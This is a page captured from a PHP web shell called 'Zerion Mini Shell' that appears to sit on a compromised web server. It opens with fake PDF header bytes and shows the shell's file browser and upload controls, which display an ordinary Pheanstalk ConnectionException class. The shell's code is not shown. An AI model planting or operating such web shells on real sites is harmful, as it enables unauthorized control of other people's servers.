%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/graphicd/www/vebto/vendor/pda/pheanstalk/src/Exception/
Upload File :
Create Path :
Current File : /home/graphicd/www/vebto/vendor/pda/pheanstalk/src/Exception/ConnectionException.php

<?php

namespace Pheanstalk\Exception;

/**
 * An exception relating to the client connection to the beanstalkd server.
 *
 * @author  Paul Annesley
 */
class ConnectionException extends ClientException
{
    /**
     * @param int    $errno  The connection error code
     * @param string $errstr The connection error message
     */
    public function __construct($errno, $errstr)
    {
        parent::__construct(sprintf('Socket error %d: %s', $errno, $errstr));
    }
}

Zerion Mini Shell 1.0